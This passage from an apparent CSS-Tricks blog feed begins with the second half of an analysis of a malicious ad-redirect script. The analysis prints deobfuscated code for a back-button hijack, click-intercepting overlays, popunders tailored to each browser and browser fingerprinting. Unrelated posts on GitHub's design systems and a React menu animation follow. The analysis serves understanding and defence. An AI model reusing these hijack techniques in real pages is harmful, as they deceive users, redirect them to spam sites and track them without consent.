The script can behave very differently depending on the configuration that gets passed to it: a lot of functions check one or several parameters in the mainoptions argument, like this:

if (options['disableSafeOpen'] || notMSIE) { // code here }

Or like this:

if (!options['disableChromePDFPopunderEventPropagation']) { p['target']['click'](); }

But the options argument, if you remember, is encrypted. So the next thing to do was to decipher it.

Decrypting the configuration parameters

At the very beginning of the script’s main code, there’s this call:

// decode options; if (typeof options === 'string') { options = decodeOptions(options, lary); }

decodeOptions is the name I gave to the function that performs the job. It was originally given the humble name g4.

Finally, we’re also using the mysteriouslary argument, whose value is:


The first half of the string is clearly the alphabet in lower letters, followed by numbers 0 through 9. The second half consists of random characters. Does that look like a cypher to you? If your answer is yes, you are damn right. It is, in fact, a simple substitution cypher, with a little twist.

The whole decodeOptions function looks like this:

function decodeOptions(Options, lary) { var p = ')', h = '(', halfLaryLength = lary.length / 2, firstHalfOfLary = lary['substr'](0, halfLaryLength), secondHalfOfLary = lary['substr'](halfLaryLength), w, // decrypts the option string before JSON parsing it g = mapByFunction(Options, function (W) { w = secondHalfOfLary['indexOf'](W); return w !== -1 ? firstHalfOfLary[w] : W; })['join'](''); if (window['JSON'] && window['JSON']['parse']) { try { return window['JSON']['parse'](g); } catch (W) { return eval(h + g + p); } } return eval(h + g + p); }

It first sets a couple of variables containing opening and closing parentheses, which will be used later:

var p = ')', h = '(',

Then it splits our lary argument in half:

halfLaryLength = lary.length / 2, firstHalfOfLary = lary['substr'](0, halfLaryLength), secondHalfOfLary = lary['substr'](halfLaryLength),

Next, It maps the Options string, letter by letter, with this function:

function (W) { w = secondHalfOfLary['indexOf'](W); return w !== -1 ? firstHalfOfLary[w] : W; }

If the current letter is present in the second half of the lary argument, it returns the corresponding letter in the lower-case alphabet in the first part of the same argument. Otherwise, it returns the current letter, unchanged. This means that the options parameter is only half encrypted, so to say.

Once the mapping has taken place, the resulting array of decrypted letters g (remember, mapByFunction always returns an array) is then converted again to a string:


The configuration is initially a JSON object, so the script tries to use the browser’s native JSON.parse function to turn it into an object literal. If the JSON object is not available (IE7 or lower, Firefox and Safari 3 or lower), it resorts to putting it between parentheses and evaluating it:

if (window['JSON'] && window['JSON']['parse']) { try { return window['JSON']['parse'](g); } catch (W) { return eval(h + g + p); } } return eval(h + g + p);

This is another case of the script being extremely cross-browser compatible, to the point of supporting browsers that are more than 10 years old. I’ll try and explain why in a while.

So, now the options variable has been decrypted. Here it is in all its deciphered splendour, albeit with the original URLs omitted:

let options = { SS: true, adblockPopup: true, adblockPopupLink: null, adblockPopupTimeout: null, addOverlay: false, addOverlayOnMedia: true, aggressive: false, backClickAd: false, backClickNoHistoryOnly: false, backClickZone: null, chromePDFPopunder: false, chromePDFPopunderNew: false, clickAnywhere: true, desktopChromeFixPopunder: false, desktopPopunderEverywhere: false, desktopPopunderEverywhereLinks: false, disableChromePDFPopunderEventPropagation: false, disableOnMedia: false, disableOpenViaMobilePopunderAndFollowLinks: false, disableOpenViaMobilePopunderAndPropagateEvents: false, disablePerforamnceCompletely: false, dontFollowLink: false, excludes: [], excludesOpenInPopunder: false, excludesOpenInPopunderCapping: null, expiresBackClick: null, getOutFromIframe: false, iOSChromeSwapPopunder: false, iOSClickFix: true, iframeTimeout: 30000, imageToTrackPerformanceOn: "", /* URL OMITTED */ includes: [], interstitialUrl: "", /* URL OMITTED */ isOnclickDisabledInKnownWebView: false, limLo: false, mahClicks: true, mobilePopUpTargetBlankLinks: false, mobilePopunderTargetBlankLinks: false, notificationEnable: false, openPopsWhenInIframe: false, openViaDesktopPopunder: false, openViaMobilePopunderAndPropagateFormSubmit: false, partner: "pa", performanceUrl: "", /* URL OMITTED */ pomc: false, popupThroughAboutBlankForAdBlock: false, popupWithoutPropagationAnywhere: false, ppuClicks: 0, ppuQnty: 3, ppuTimeout: 25, prefetch: "", resetCounters: false, retargetingFrameUrl: "", scripts: [], sessionClicks: 0, sessionTimeout: 1440, smartOverlay: true, smartOverlayMinHeight: 100, smartOverlayMinWidth: 450, startClicks: 0, startTimeout: 0, url: "", /* URL OMITTED */ waitForIframe: true, zIndex: 2000, zoneId: 1628975 }

I found the fact that there is an aggressive option very interesting, even though this option is unfortunately not used in the code. Given all the things this script does to your browser, I was very curious what it would have done had it been more "aggressive."

Not all of the options passed to the script are actually used in the script; and not all of the options the script checks are present in the options argument passed in this version of it. I assume that some of the options that are not present in the script’s configuration are used in versions deployed onto other sites, especially for cases in which this script is used on multiple domains. Some options might also be there for legacy reasons and are simply not in use anymore. The script has some empty functions left in, which likely used some of the missing options.

What does the script actually do?

Just by reading the name of the options above, you can guess a lot of what this script does: it will open a smartOverlay, even using a special adblockPopup. If you clickAnywhere, it will open a url. In our specific version of the script, it will not openPopsWhenInIframe, and it will not getOutFromIframe, even though it will apply an iOSClickFix. It will count popups and save the value in ppuCount, and even track performance using an imageToTrackPerformanceOn (which I can tell you, even if I omitted the URL, is hosted on a CDN). It will track ppuClicks (pop up clicks, I guess), and cautiously limit itself to a ppuQnty (likely a pop up quantity).

By reading the code, I could find out a lot more, obviously. Let’s see what the script does and follow its logic. I will try to describe all of the interesting things it can do, including those that are not triggered by the set of options I was able to decipher.

The main purpose of this script is to direct the user to a URL that is stored in its configuration as options['url']. The URL in the configuration I found redirected me to a very spammy website, so I will refer to this this URL as Spammy Site from now on, for the sake of clarity.

1. I want to get out of this iFrame!

The first thing this script does is try to get a reference to the top window if the script itself is run from within in an iFrame and, if the current configuration requires it, sets that as the main window on which to operate, and sets all reference to the document element and user agent to those of the top window:

if (options['getOutFromIframe'] && iframeStatus === 'InIframeCanExit') { while (myWindow !== myWindow.top) { myWindow = myWindow.top; } myDocument = myWindow['document']; myDocumentElement = myWindow['document']['documentElement']; myUserAgent = myWindow['navigator']['userAgent']; } 2. What’s your browser of choice?

The second thing it does is a very minute detection of the current browser, browser version and operating system by parsing the user agent string. It detects if the user is using Chrome and its specific version, Firefox, Firefox for Android, UC Browser, Opera Mini, Yandex, or if the user is using the Facebook app. Some checks are very specific:

isYandexBrowser = /YaBrowser/['test'](myUserAgent), isChromeNotYandex = chromeVersion && !isYandexBrowser,

We’ll see why later.

3. All your browser are belong to us. Original meme here.

The first disturbing thing the script does is check for the presence of the history.pushState() function, and if it is present, the script injects a fake history entry with the current url’s title. This allows it to intercept back click events (using the popstate event) and send the user to the Spammy Site instead of the previous page the user actually visited. If it hadn’t added a fake history entry first, this technique would not work.

function addBackClickAd(options) { if (options['backClickAd'] && options['backClickZone'] && typeof window['history']['pushState'] === 'function') { if (options['backClickNoHistoryOnly'] && window['history'].length > 1) { return false; } // pushes a fake history state with the current doc title window['history']['pushState']({exp: Math['random']()}, document['title'], null); var createdAnchor = document['createElement']('a'); createdAnchor['href'] = options['url']; var newURL = 'http://' + createdAnchor['host'] + '/afu.php?zoneid=' + options['backClickZone'] + '&var=' + options['zoneId']; setTimeout(function () { window['addEventListener']('popstate', function (W) { window['location']['replace'](newURL); }); }, 0); } }

This technique is used only outside the context of an iFrame, and not on Chrome iOS and UC Browser.

4. This browser needs more scripts

If one malicious script was not enough, the script tries to inject more scripts, depending on the configuration. All scripts are appended to the <head> of the document, and may include something that is called either an Interstitial, a Slider, or a Pushup, all of which I assume are several forms of intrusive ads that get shown to the browser. I could not find out because, in our script’s case, the configuration did not contain any of those, apart from one which was a dead URL when I checked it.

5. Attack of the click interceptor

Next, the script attaches a "click interceptor" function to all types of click events on the document, including touch events on mobile. This function intercepts all user clicks or taps on the document, and proceeds to open different types of pop-ups, using different techniques depending on the device.

In some cases it tries to open a "popunder." This means that it intercepts any click on a link, reads the original link destination, opens that link in the current window, and opens a new window with the Spammy Site in it at the same time. In most cases, it proceeds to restore focus to the original window, instead of the new window it has created. I think this is meant to circumvent some browser security measures that check if something is changing URLs the user has actually clicked. The user will then find themselves with the correct link open, but with another tab with the Spammy Site in it, which the user will sooner or later see when changing tabs.

In other cases, the script does the opposite and opens a new window with the link the user has clicked on, but changes the current window’s URL to that of the Spammy Site.

To do all this, the script has different functions for different browsers, each presumably written to circumvent the security measures of each browser, including AdBlock if it is present. Here is some of the code doing this to give you an an idea:

if (options['openPopsWhenInIframe'] && iframeStatus === 'InIframeCanNotExit') { if (isIphoneIpadIpod && (V || p9)) { return openPopunder(W); } return interceptEventAndOpenPopup(W); } if (options['adblockPopup'] && currentScriptIsApuAfuPHP) { return createLinkAndTriggerClick(options['adblockPopupLink'], options['adblockPopupTimeout']); } if (options['popupThroughAboutBlankForAdBlock'] && currentScriptIsApuAfuPHP) { return openPopup(); } if (!isIphoneIpadIpodOrAndroid && (options['openViaDesktopPopunder'] || t)) { if (isChromeNotYandex && chromeVersion > 40) { return injectPDFAndDoStuffDependingOnChromeVersion(W); } if (isSafari) { return openPopupAndBlank(W); } if (isYandexBrowser) { return startMobilePopunder(W, I); } } /* THERE ARE SEVERAL MORE LINES OF THIS KIND OF CODE */

To give you an example of a browser-specific behavior, the script opens a new window with the Spammy Site in it on Safari for Mac, immediately opens a blank window, gives that focus and then immediately closes it:

function openPopupAndBlank(W) { var O = 'about:blank'; W['preventDefault'](); // opens popup with options URL safeOpen( options['url'], 'ppu' + new Date()['getTime'](), ['scrollbars=1', 'location=1', 'statusbar=1', 'menubar=0', 'resizable=1', 'top=0', 'left=0', 'width=' + window['screen']['availWidth'], 'height=' + window['screen']['availHeight']]['join'](','), document, function () { return window['open'](options['url']); } ); // opens blank window, gives it focuses and closes it (??) var i = window['window']['open'](O); i['focus'](); i['close'](); }

After setting up click interception, it creates a series of "smartOverlays." These are layers using transparent GIFs for a background image, which are positioned above each of the <object>, <iframe>, <embed>, <video> and <audio> tags that are present in the original document, and cover them completely. This is meant to intercept all clicks on any media content and trigger the click interceptor function instead:

if (options['smartOverlay']) { var f = []; (function d() { var Z = 750, affectedTags = 'object, iframe, embed, video, audio'; mapByFunction(f, function (W) { if (W['parentNode']) { W['parentNode']['removeChild'](W); } }); f = mapByFunction(safeQuerySelectorAll(affectedTags), function (W) { var O = 'px' if (!checkClickedElementTag(W, true)) { return; } if (flashPopupId && W['className'] === flashPopupId) { return; } if (options['smartOverlayMinWidth'] <= W['offsetWidth'] && options['smartOverlayMinHeight'] <= W['offsetHeight']) { var Q = getElementTopAndLeftPosition(W); return createNewDivWithGifBackgroundAndCloneStylesFromInput({ left: Q['left'] + O, top: Q.top + O, height: W['offsetHeight'] + O, width: W['offsetWidth'] + O, position: 'absolute' }); } }); popupTimeOut2 = setTimeout(d, Z); })(); }

This way, the script is able to even intercept clicks on media objects that might not trigger standard "click" behaviors in JavaScript.

The script tries to do another couple of strange things. For example, on mobile devices, it tries to scan for links that point to a blank window and attempts to intercept them with a custom function. The function even temporarily manipulates the rel attribute of the links and sets it to a value of 'noopener noreferer' before opening the new window. It is a strange thing to do since this is supposedly a security measure for some older browsers. The idea may have been to avoid performance hits to the main page if the Spammy Site consumes too many resources and clogs the original page (something Jake Archibald explains here). However, this technique is used exclusively in this function and nowhere else, making it is a bit of a mystery to me.

The other strange thing the script does is to try and create a new window and add an iFrame with a PDF string as its source. This new window is immediately positioned off screen and the PDF iFrame is removed in case of a change of focus or visibility of the page. In some cases, only after the PDF has been removed does the script redirect to the Spammy Site. This feature seems to only target Chrome and I haven’t been able to determine whether the PDF is malicious or not.

6. Tell me more about yourself

Lastly, the script proceeds to collect a lot of information about the browser, which will be appended to the URL of the Spammy Site. It checks the following:

  • if Flash is installed
  • the width and height of the screen, the current window, and the window’s position in respect to the screen
  • the number of iFrames in the top window
  • the current URL of the page
  • if the browser has plugins installed
  • if the browser is PhantomJs or Selenium WebDriver (presumably to check if the site is currently being visited by an automated browser of some sort, and probably do something less scary than usual since automated browsers are likely to be used by companies producing anti-virus software, or law enforcement agencies)
  • if the browser supports the sendBeacon method of theNavigatorobject
  • if the browser supports geolocation
  • if the script is currently running in an iFrame

It then adds these values to the Spammy Site’s URL, each encoded with its own variable. The Spammy Site will obviously use the information to resize its content according to the size of the browser window, and presumably also to adjust the level of the content’s maliciousness depending on whether the browser is highly vulnerable (for example, it has Flash installed) or is possibly an anti-spam bot (if it is detected as being an automated browser).

After this, the script is done. It does quite a few interesting things, doesn’t it?

Techniques and cross-browser compatibility

Let’s look at a few of techniques the script generally uses and why it needs them.

Browser detection

When writing code for the web, avoiding browser detection is typically accepted as a best practice because it is an error-prone technique: user agent strings are very complicated to parse and they can change with time as new browsers are released. I personally avoid browser detection on my projects like the plague.
In this case, however, correct browser detection can mean the success or failure of opening the Spammy Site on the user’s computer. This is the reason why the script tries to detect the browser and OS as carefully as it can.

Browser compatibility

For the same reasons, the script uses a lot of cross-browser techniques to maximize compatibility. This might be a result of a very old script which has been updated many times over the years, while keeping all of the legacy code intact. But it might also be a case of trying to keep the script compatible with as many browsers as possible.

After all, for people who are possibly trying to install malware on unsuspecting users, a user who is browsing the web with a very outdated browser or even a newer browser with outdated plug-ins is much more vulnerable to attacks and is certainly a great find!

One example is the function the script uses to open new windows in all other functions, which I’ve renamed safeOpen:

// SAFE OPEN FOR MSIE function safeOpen(URLtoOpen, popupname, windowOptions, myDocument, windowOpenerFunction) { var notMSIE = myUserAgent['indexOf']('MSIE') !== -1; if (options['disableSafeOpen'] || notMSIE) { var W9 = windowOpenerFunction(); if (W9) { try { W9['opener']['focus'](); } catch (W) { } W9['opener'] = null; } return W9; } else { var t, c, V; if (popupname === '' || popupname == null) { popupname = 'new_popup_window_' + new Date()['getTime'](); } t = myDocument['createElement']('iframe'); t['style']['display'] = 'none'; myDocument['body']['appendChild'](t); c = t['contentWindow']['document']; var p9 = 'newWin_' + new Date()['getTime'](); V = c['createElement']('script'); V['type'] = 'text/javascript'; V['text'] = [ 'window.top = null;', 'window.frameElement = null;', 'var newWin = window.open(' + atob('Ig==') + '' + URLtoOpen + '' + atob('Ig==') + ', ' + atob('Ig==') + '' + popupname + '' + atob('Ig==') + ', ' + atob('Ig==') + '' + windowOptions + '' + atob('Ig==') + ');', 'window.parent.' + p9 + ' = newWin;', 'window.parent = null;', 'newWin.opener = null;' ]['join'](''); c['body']['appendChild'](V); myDocument['body']['removeChild'](t); return window[p9]; } }

Every time this function is called, it is passes another function to run that opens a new window (it is the last argument passed to the function above, called windowOpenerFunction). This function is customized in each call depending on the specific need of the current use case. However, if the script detects that it’s running on Internet Explorer, and the disableSafeOpen option is not set to true, then it resorts to a fairly convoluted method to open the window using the other parameters (URLtoOpen, popupname, windowOptions, myDocument) instead of using the windowOpenerFunction function to open the new window. It creates an iFrame, inserts it into the current document, then adds a JavaScript script node to that iFrame, which opens the new window. Finally, it removes the iFrame that it just created.

Catching all exceptions

Another way this script always stays on the safe side is to catch exceptions, in fear that they will cause errors that might block JavaScript execution. Every time it calls a function or method that is not 100% safe on all browsers, it does so by passing it through a function that catches exceptions (and handles them if passed a handler, even though I haven’t spotted a use case where the exception handler is actually passed). I’ve renamed the original function tryFunctionCatchException, but it could have easily been called safeExecute:

function tryFunctionCatchException(mainFunction, exceptionHandler) { try { return mainFunction(); } catch (exception) { if (exceptionHandler) { return exceptionHandler(exception); } } } Where does this script lead?

As you’ve seen, the script is configurable to redirect the user to a specific URL (the Spammy Site) which must be compiled in the semi-encrypted option for each individual version of this script that is deployed. This means the Spammy Site can be different for every instance of this script. In our case, the target site was some sort of Ad Server serving different pages, presumably based on an auction (the URL contained a parameter called auction_id).

When I first followed the link, it redirected me to what indeed was a very spammy site: it was advertising get-rich-quick schemes based on online trading, complete with pictures of a guy sitting in what was implied to be the new Lamborghini he purchased by getting rich with said scheme. The target site even used the Evercookie cookie to track users.

I recently re-ran the URL a few times, and it has redirected me to:

  • a landing page belonging to a famous online betting company (which has been the official sponsor of at least one European Champions League finalist), complete with the usual "free betting credit"
  • several fake news sites, in Italian and in French
  • sites advertising "easy" weight-loss programs
  • sites advertising online cryptocurrency trading

This is a strange script, in some respect. It seems that it has been created to take total control of the user’s browser, and to redirect the user to a specific target page. Theoretically, this script could arbitrarily inject other malicious scripts like keyloggers, cryptominers, etc., if it chose to. This kind of aggressive behavior (taking control of all links, intercepting all clicks on videos and other interactive elements, injecting PDFs, etc.) seems more typical of a malicious script that has been added to a website without the website owner’s consent.

However, after more than a month since I first found it, the script (in a slightly different version) is still there on the original website. It limits itself to intercepting every other click, keeping the original website at least partially usable. It is not that likely that the website’s original owner hasn’t noticed the presence of this script given that it’s been around this long.

The other strange thing is that this script points to what is, in all respects, an ad bidding service, though one that serves very spammy clients. There is at least one major exception: the aforementioned famous betting company. Is this script a malicious script which has evolved into some sort of half-legitimate ad serving system, albeit a very intrusive one? The Internet can be a very complicated place, and very often things aren’t totally legitimate or totally illegal — between black and white there are always several shades of grey.

The only advice I feel I can give you after analyzing this script is this: the next time you feel the irresistible urge to watch a table tennis match online, go to a legitimate streaming service and pay for it. It will save you a lot of hassles.

The post Anatomy of a malicious script: how a website can take over your browser appeared first on CSS-Tricks.

Design Systems at GitHub

Css Tricks - Thu, 07/12/2018 - 6:53am

Here’s a nifty post by Diana Mounter all about the design systems team at GitHub that details how the team was formed, the problems they've faced and how they've adapted along the way:

When I started working at GitHub in late 2015, I noticed that there were many undocumented patterns, I had to write a lot of new CSS to implement designs, and that there weren’t obvious underlying systems connecting all the pieces together. I knew things could be better and I was enthusiastic about making improvements—I quickly discovered that I wasn’t the only one that felt this way. There were several folks working on efforts to improve things, but weren’t working together. With support from design leads, a group of us started to meet regularly to discuss improvements to Primer and prioritize work—this was the beginnings of the design systems team.

This whole post had me nodding furiously along to every word but there was one point that I particularly made note of: the part where Diana mentions how her team decided to make “the status of styles more obvious” in order to communicate changes to the rest of the team.

Lately, I’ve noticed how design systems can demonstrate the status of a project, which is super neat. Communicating these large changes to the codebase early and frequently, over-communicating almost, is probably a good idea when a design systems team is just getting started.

Direct Link to ArticlePermalink

The post Design Systems at GitHub appeared first on CSS-Tricks.

Building a Complex UI Animation in React, Simply

Css Tricks - Thu, 07/12/2018 - 3:45am

Let’s use React, styled-components, and react-flip-toolkit to make our own version of the animated navigation menu on the Stripe homepage. It's an impressive menu with some slick animation effects and the combination of these three tools can make it relatively easy to recreate.

This is an intermediate-level walkthrough that assumes familiarity with React and basic animation concepts. Our React guide is a good place to start.

Here's what we're aiming to make:

See the Pen React Stripe Menu by Alex (@aholachek) on CodePen.

View Repo

Breaking down the animation

First, let's break down the animation into different parts so we can more easily reproduce it. You might want to check out the finished product in slow motion (use the toggles) so you can catch all the details.

  1. The white dropdown container updates both its size and position.
  2. The gray background in the bottom half of the dropdown container transitions its height.
  3. As the dropdown container moves, the previous contents fade out and slightly to the opposite direction, as if the dropdown is leaving them behind, while the new contents slide into view.

There are a few useful guiding rules to keep in mind as we embark on reproducing this animation in React. Where possible, let’s keep things simple by having the browser manage layout. We’ll do this by keeping elements in the regular DOM flow instead of using absolute positioning and manual calculation. Rather than having a single dropdown component that we have to relocate every time a user's mouse position changes, we’ll render a single dropdown in the appropriate navbar section.

We’ll use the FLIP technique to create the illusion that the three separate dropdown components are actually a single, moving component.

Scaffolding out the UI with styled-components

To start with, we'll build an unanimated navbar component that simply takes a configuration object of titles and dropdown components and renders a navbar menu. The component will show and hide the relevant dropdown on mouseover.

We’ll build the UI components using styled-components. Not only are they a convenient way to build a modular UI, but they have a great API for adding configurable CSS keyframe animations. It turns out CSS animations and React play really nicely together, so we’ll be using CSS keyframes to add many of the animations later on.

With the components assembled without any animations, we’ve created something that looks like this:

See the Pen React Stripe Menu Before Animation by Alex (@aholachek) on CodePen.

Notice that the gray background at the bottom of the menu is missing. It’s the only element that we’re going to have to take out of the regular DOM flow and absolutely position, so we’ll ignore it for now.

Animating our dropdown with the FLIP technique

We’re going to be using the react-flip-toolkit library to help us animate the dropdown’s size and position. This is a library I put together to make advanced and complex transitions easier and configurable.

It provides us with two components: a top-level <Flipper/> component, and a <Flipped/> component to wrap any children we want to animate.

First, let's set up the Flipper wrapper component in the render function of AnimatedNavbar:

// currentIndex is the index of the hovered dropdown <Flipper flipKey={currentIndex}> <Navbar> {navbarConfig.map((n, index) => { // render navbar items here })} </Navbar> </Flipper>

Next, in our DropdownContainer component, we'll wrap elements that need to be animated in their own Flipped components, making sure to give them each a unique flipdId prop:

<DropdownRoot> <Flipped flipId="dropdown-caret"> <Caret /> </Flipped> <Flipped flipId="dropdown"> <DropdownBackground> {children} </DropdownBackground> </Flipped> </DropdownRoot>

We're animating the <Caret/> component and the <DropdownBackground/> component separately so that the overflow:hidden style on the <DropdownBackground/> component doesn't interfere with the rendering of the <Caret/> component.

Now we’ve got a working FLIP animation, but there’s still one problem: the contents of the dropdown appear weirdly stretched over the course of the animation:

See the Pen React Stripe Menu -- Error #1: no scale adjustment by Alex (@aholachek) on CodePen.

This unwanted effect occurs because scale transforms apply to children. If you apply a scaleY(2) to a div with some text inside, you will be scaling up the text and distorting it as well.

We can solve this problem by wrapping the children in a Flipped component with an inverseFlipId that references the parent component's flipId (in this case "dropdown") to request that parent transforms be cancelled out for children. Because we still want translate transforms to affect the children, we also pass the scale prop to limit the cancellation to just scale changes.

<DropdownRoot> <Flipped flipId="dropdown-caret"> <Caret /> </Flipped> <Flipped flipId="dropdown"> <DropdownBackground> <Flipped inverseFlipId="dropdown" scale> {children} </Flipped> </DropdownBackground> </Flipped> </DropdownRoot>

Whew. All that work and we’ve created something that looks like this:

See the Pen React Stripe Menu -- Simple FLIP by Alex (@aholachek) on CodePen.

It’s all in the details

It’s getting closer, but we still have to attend to the small details the make the animation look great: the subtle rotation animation when the dropdown appears and disappears, the cross-fade of previous and current dropdown children, and that silky-smooth gray background height animation.

Configurable CSS keyframe animations with styled components

Styled-components, which we've been using to build up the UI for this demo, offer a super convenient way to create configurable keyframe animations. We'll use this functionality for both the dropdown enter animation and the cross-fade of the contents. We can pass in some basic information about the desired animation — whether the contents are animating in or out, and the direction the user's mouse has moved — and automatically get the appropriate animation applied. Here, for example, is the code for the crossfade animation in the <FadeContents> component:

const getFadeContainerKeyFrame = ({ animatingOut, direction }) => { if (!direction) return; return keyframes` from { transform: translateX(${ animatingOut ? 0 : direction === "left" ? 20 : -20 }px); } to { transform: translateX(${ !animatingOut ? 0 : direction === "left" ? -20 : 20 }px); opacity: ${animatingOut ? 0 : 1}; } `; }; const FadeContainer = styled.div` animation-name: ${getFadeContainerKeyFrame}; animation-duration: ${props => props.duration * 0.5}ms; animation-fill-mode: forwards; position: ${props => (props.animatingOut ? "absolute" : "relative")}; opacity: ${props => (props.direction && !props.animatingOut ? 0 : 1)}; animation-timing-function: linear; top: 0; left: 0; `;

Each time the user hovers a new item, we'll provide not only the current dropdown, but the previous dropdown as children to the DropdownContainer component, along with information about which direction the user's mouse has moved. The DropdownContainer component will then wrap both its children in a new component, FadeContents, that will use the keyframe animation code above to add the appropriate transition.

Here's a link to the full code for the FadeContents component.

The dropdown's enter/exit animation will function very similarly.

The final touch: A fluid background animation

Finally, let’s add the gray background animation. To keep this animation crisp, we need to diverge from our previous strategy of keeping normal DOM nesting and letting the browser handle layout, and perform some manual positioning calculations instead. We'll also need to interact directly with the DOM. In short, it's going to get a little messy.

Here's a visual representation of our basic approach:

See the Pen React Stripe Menu -- Animated Background by Alex (@aholachek) on CodePen.

We’ll absolutely position a gray div at the top of the DropdownContainer. In the componentDidMount lifecycle function of DropdownContainer, we’ll update the translateY transform of the gray background. If the dropdown container component only has a single child (which means the user has only hovered a single dropdown so far), we’ll set the gray div’s translateY to the height of the first dropdown section. If there are two children, including a previous dropdown, we’ll instead set the initial translateY to the height of the previous dropdown’s first section, and then animate the translateY to the height of the current dropdown’s first section. Here's the function the gets called in componentDidMount:

const updateAltBackground = ({ altBackground, prevDropdown, currentDropdown }) => { const prevHeight = getFirstDropdownSectionHeight(prevDropdown) const currentHeight = getFirstDropdownSectionHeight(currentDropdown) // we'll use this function when we want a change // to happen immediately, without CSS transitions const immediateSetTranslateY = (el, translateY) => { el.style.transform = `translateY(${translateY}px)` el.style.transition = "transform 0s" requestAnimationFrame(() => (el.style.transitionDuration = "")) } if (prevHeight) { // transition the grey ("alt") background from its previous height // to its current height immediateSetTranslateY(altBackground, prevHeight) requestAnimationFrame(() => { altBackground.style.transform = `translateY(${currentHeight}px)` }) } else { // immediately set the background to the appropriate height // since we don't have a stored value immediateSetTranslateY(altBackground, currentHeight) } }

This approach requires DropdownContainer to use a ref and reach inside its children to take DOM measurements in the getFirstDropdownSectionHeight function, which feels sloppy. If you have any ideas for alternative implementations, please let me know in the comments!

Wrapping up

Hopefully this article has helped clarify some techniques you can use the next time you build an animation in React. There are normally multiple ways of achieving any effect, but often it makes sense to start with the simplest possible implementation — basic components with some CSS transitions or keyframe animations — and scale up the complexity from there when necessary. In our case, that meant including an additional library, react-flip-toolkit, so we didn't have to worry about manually transitioning the position of the dropdown component across the screen. To fully recreate the animation, we did have to write a fair amount of code. But by breaking down this animation into separate parts and tackling them one-by-one, we managed to replicate a pretty cool UI effect in React.

The post Building a Complex UI Animation in React, Simply appeared first on CSS-Tricks.

Syndicate content
©2003 - Present Akamai Design & Development.